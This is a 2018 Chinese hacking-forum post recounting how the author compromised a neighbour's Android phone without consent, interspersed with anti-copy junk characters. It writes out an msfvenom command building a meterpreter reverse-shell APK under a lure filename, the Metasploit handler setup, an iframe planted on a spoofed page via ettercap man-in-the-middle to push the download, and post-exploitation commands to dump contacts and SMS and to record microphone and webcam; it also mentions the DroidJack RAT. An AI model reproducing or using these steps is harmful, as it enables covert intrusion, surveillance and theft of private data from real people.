找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1621|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

* C0 Z1 K4 d6 l0 T. w& \1 `6 T) K9 } 五、msf+ettercap入侵邻居安卓手机 ! A- x+ m8 U p/ e

) C7 C3 \& E) ?* q1 A9 P' [

. e! d4 o% h: l 首先启动msf : {- _7 P5 Z n0 a: C

' c7 p" [8 F' C0 N( g. v

* s* o$ a1 E1 K$ @. Z 先用kali生成一个安卓木马,如下命令: , W7 J7 Z6 w/ ^. O

3 q h9 p5 M+ G

0 Y% M- P5 }& a" D3 v- i" i' I Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ) b. f7 S7 O$ K# _+ @1 t

, l1 S, o& g4 ?! Y! C/ r; m4 W, r

3 p& T/ c; M3 t 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 / W/ {! M$ R' F5 F

9 m( e6 s. W' o, P9 v5 F

8 w8 Q! ]" ?% `: Y! ~ 然后进入msf # d7 f9 S" Z9 A" [% }0 |

. Z0 e5 q% \1 e. N

. f# _% n, s# F8 [ use exploit/multi/handler / ~+ B, N1 v' Z1 S1 A. S: z

6 P/ b, }. x6 m" Z0 o) v

, a$ K6 \* o, K8 E* W( _0 u set payload android/meterpreter/reverse_tcp - ~ t8 \; w' j

( e) k( {: X* Y' G+ a

/ D* ]& V% w) S& p: M( t$ v% O set LHOST 192.168.0.109 //ipkailiip # q5 `: \& _* U0 K2 x5 i& u

* U, O7 o, X( W" {) V8 Y% d% x

6 V: _# T- B8 C set LPORT 44444 //端口一定要与前面生成的木马的端口一致 8 e0 C1 |0 H* r* A( L k! z# w

( K* P/ D5 c: ?! A$ W

9 P7 Q3 P# T8 s' q( O Exploit ; U1 N2 x4 X6 l+ X& V0 X8 Y

/ j5 n- ^- H" h& `* m; i

+ k" f. y6 X- m2 A" j/ ^   9 b+ v( b2 ^% n. \- u/ ?

. O+ ~5 \' ?4 b+ b& w

( N: Y7 G& \1 a3 e+ X- b 下面我们开启ettercap -G + t v: W$ `8 }2 G) T

% T- J% }1 S! { I5 t8 ^1 ^

; L, {8 l1 P. V- g+ U 我物理IP 4 S% h0 W8 Q }% J! q* u

) W4 Z! k& R w- u

4 Q& L% @- Y$ x/ h" z   4 m; p! s9 G' ^0 A- b+ @

6 w! c1 U ^7 {. e% G. c

5 _' l1 l4 b# b5 {, X 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, " ^5 P6 ^% H& \& S$ @2 A5 _4 {

' [, q3 ]/ d. ^

& o W9 K9 L" B% c3 [- m0 k 下面我们来设置一下 . S$ q2 R" X* i l

7 Z- t. [) r1 _& V$ \) k

& R |. Z( k7 i! f: u2 B5 P   ; _5 S; y8 j% E* h7 l- H w

4 G3 S+ g1 x9 ^, ?

8 t6 U0 C% G; O! z( X 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ! }! |. } s" z$ A$ m

* P" p1 n) @9 a9 D# d

9 u6 H% D' L/ K8 w: ?9 M; F" l   ! J2 h, x5 ~# Q

0 v+ r: p: U8 G/ L! e. o% v

6 r4 \6 C: \6 n1 b/ |6 |   4 @9 F$ ]8 F+ n1 b, j, t, U" G+ l" j

5 E! `8 o% J0 |" l: }6 Z2 \3 j

- |9 D4 m. W& ?, e; @' N4 X3 X   ( m+ ?7 L* p' _4 L; B h. y: O

$ G% N' k3 B7 n1 `1 Q

8 v; C% S, p7 ~/ {0 ~/ }   # |! g8 q! j% i/ A

# ^5 Z# Z. o. m

6 B5 I- v4 r% y( @   . u6 f- B8 F- h: E! Q0 n y8 V

% u4 {. K! l0 }& \7 f) ~; ^

8 q& [" ~! `; n7 d F' Z) R   & ?3 _$ i1 H# u# M4 R) @. H' ~

I2 ?9 q/ D- j9 S" }8 d

! f' M+ z8 k; F7 k   6 @; F! [ J* @& K/ V

: T# f1 }5 M/ M0 {

0 F H; C9 S, k8 ~7 O8 s   6 c" r* j4 d7 a3 o E& R8 q2 N

; y0 O. F' `; s* F9 v( @/ M- o$ y' F

1 |: t* o' C" n: Z# s   ) r( o& I$ { B1 U# m

4 |' y+ g, q+ `; p

2 w, R5 {/ |1 R* q2 f4 ?   9 p. Q ?3 I" u% i, H: k/ c5 M

( o1 `7 H. `3 g8 j9 |; i; D+ \

2 O2 q8 D" J6 ]$ d& J9 x& r$ b   2 E# Y+ @6 `$ s& z( r% z2 R$ g

; C' c2 t3 z$ O( E

) s# ]( n5 \( c3 A6 Z) U% n" L   + [. F! R X+ _2 ^; g6 t' \1 W

( w( B9 [; q% R9 d O6 @

0 {, w# B! S6 N) e   1 `2 R7 N/ P) @' A: L ~; s

' b, U5 K0 b! T2 E; j

1 A) Q$ Q4 I& B. y1 e 下面我们开始攻击 - G5 [* l1 `, H6 w

2 s5 d2 l! S3 v$ P* w- q

B0 }9 p6 R; b% {   1 G: I+ }6 X/ V/ J |

6 F3 w0 y$ n" L; q7 U" n' L, R

x4 C- L) ^4 Y% @4 _   ! b3 `5 {" u; [/ p$ P. o

4 v( p% _5 ]/ x* R, p# z

; b5 b y$ |2 @+ [; S   9 s% R* c7 a2 o: B+ H

# C8 \6 @ `0 I4 t+ J D

; j0 u5 I: y" d/ i4 v   1 M) S- y1 x4 b h

3 f4 g4 k$ K, d: S2 B& H/ h- N

8 k; X: y4 H& }9 e/ g5 ~   : t7 C/ p' h$ I

2 ^# F, x4 D$ J8 ]

8 q i$ E9 |3 s8 a2 p$ G 大概过了5分钟多,发现反弹成功了 + E" f9 `& s N8 E: y

/ @* r; a w: x. q% m

: q7 v( e' h" C! t& }   9 j; |7 y! a! [+ u" {6 T

7 ^: k% @+ {0 ]

# Y0 X6 Y$ f( Q; K   1 E$ n& f, ^' [( O, w& J

6 c' ~9 c: C+ S+ W0 ]+ P; f8 C

5 c, d% d, q- Y% D3 ]- C" _   ) B2 ]' h9 F% ~4 x: Y

& C0 x, \- H6 ]0 m

" n; P% m/ t: R' V$ }: x   ' T- X# p M. o* R" w( g& I2 V( a

% t C" L. U0 j: D/ {0 E

/ i0 d% R/ |' N( F4 O   - k) q9 Q: P R. k0 x. }

B# y( B/ @* q. h2 v0 Q

0 V5 F Q& t6 m, ]4 _; K   , h9 i0 W; K, o3 A9 T- r# k

6 Q, I3 s, B: q1 }

4 P* J; d2 V f0 m$ v2 W8 {   ! W9 q. [3 n/ N

% k' h& J5 F' F- k1 |: d

2 c9 P+ n2 l2 O& C( K) v, j 执行命令 3 u! \/ ^8 ^2 b2 e4 g" R F

5 Q. x0 r: d, F( z- _

# o }. @: N) `( W2 R/ d/ C   5 C' ^ X' M" E: F

4 p3 ]: Q3 g, K2 ~2 Z' F. R; G

6 v+ h2 t& G$ r T0 u dump_contacts    --》这个是导出电话 8 U1 d: O' Q% ~; c8 Y

; e) c0 n) U* V

& S: e. R2 K5 b4 Y1 t, y4 w/ h dump_sms --》这个是导出信息 7 O/ u# A& E* S' Y

: o1 ^( D4 H2 I6 F) V E t* D

0 \8 |) X0 Y- J; t5 j6 P* Q9 f record_mic     Record audio from the default microphone for X seconds 2 O- Z1 R! T6 E, Q( L4 I) ~5 k

9 e# Y1 a5 u, T$ n/ O5 S' ]2 Z7 W$ x

7 b9 E3 _! _3 U5 A. P* q7 I& t     webcam_chat    Start a video chat / e5 A8 C. v6 f7 V Z$ H1 p6 f) l

) M' l1 }3 l; M& g! B( ~7 i0 O

/ C' F" M8 ]0 Y* S0 }+ N6 d3 ]     webcam_list    List webcams x k* i' U% h( k$ g$ ]

+ H; `+ }' t( w

* K9 I. G' o) ^: R     webcam_snap    Take a snapshot from the specified webcam % R* y0 `5 c$ y9 b2 K W" R

I5 M' U" j6 H) R: S8 i* Q

+ L/ e7 l2 U% f, ]/ _9 c3 n webcam_stream  lay a video stream from the specified webcam . R: J" F4 C9 }

2 k& `0 Q$ f. A5 f4 f( @" S9 N, a

8 K6 u9 j: U; Q" ]1 F3 ?   1 k$ U+ } R8 `8 V# Y6 c; C

; q M3 s: Y& o3 D$ N0 N" X

! a5 C6 N5 F$ L   1 d2 ^. w b, H' U3 i

6 P ^7 B! q3 U- N8 K

# s( g& N5 r6 Q5 \3 B; P/ g6 A 我们打开看一下电话薄, 4 `" [! I0 M+ M! c& n

/ ~/ c2 Z- Y! `2 _, [4 y+ }7 a

5 J9 s' T# k; o/ }7 ?   - w0 B4 y0 u7 c2 v

- T; r0 d, Y* N8 a

/ p+ j- W* N6 l# p   / a$ s4 w! _3 Y( Q; T

9 U% ]% i0 [" N& m* }$ H

! P9 I" k1 Y/ [* X   ; R4 \# `& m. p& |1 f4 Q

. z: S6 y7 L8 A2 B6 X& G

6 _$ k/ d# Y0 `* d- R7 S   1 X' L, z5 W5 T* d, C1 o4 @0 L

7 w9 f8 J3 z- L! f

u |1 }' r; \) C9 C   ! G v" x. p; `0 X

7 F- u% v3 S0 a. J1 y( A7 X, U( z

5 Z" i$ q- M2 i) L- B. y* C. t   - Y1 b, c8 ^$ E* Q: m# z2 r

Z4 h7 ?3 G0 F

, }; }4 S# U3 [( w) w 我们同时欺骗成DroidJack木马,使用方法如图: ) R; {# g, h9 R) U4 `$ f1 x3 w, v

* C' l$ T: V9 u1 A5 z

) [4 y! u( m- J$ T   0 _( c2 x% i. _# o

$ c m5 J8 q) q6 \" F

+ }, K: ?; P, {/ N8 B& f1 h$ I   1 R5 p+ c6 s& p3 F$ D. Z

t2 ~; u" T( {# I! l7 v, L

( a" k1 C7 n% Q   ( ~( z3 L: W1 k" Q9 Y

' c' y; e4 A9 c! W1 C

) l, ]# G6 p" O! T 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 9 I3 j# d( h+ H0 L, i" T0 K4 S

# I# R6 X4 M5 i; J

+ w. n& G6 r( r0 m/ o+ f3 e; Q0 h0 t   1 F6 M* N7 t( d9 f4 n- ^9 _' z1 B

$ b! k/ t6 C3 v# n1 H* u

. ~/ l* a# R. M( M2 I0 |& B. f   / H3 t& T9 R( n6 \

1 b2 `' t2 X6 g, H

! Y9 S. q l8 V# [0 N) b8 M   4 B2 E6 t8 _" B0 f

+ S" y5 v) Y. t9 t1 l: X M& x

# U, R# W4 \+ ^/ ?2 H% r( ^# h! r4 X" G B 6 C5 h! g6 ]7 d1 B! r2 T4 H

7 c6 H4 [2 Z r

4 e5 S4 Q. ^7 T$ z
# L- ?% E+ L- k% a. U6 z

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表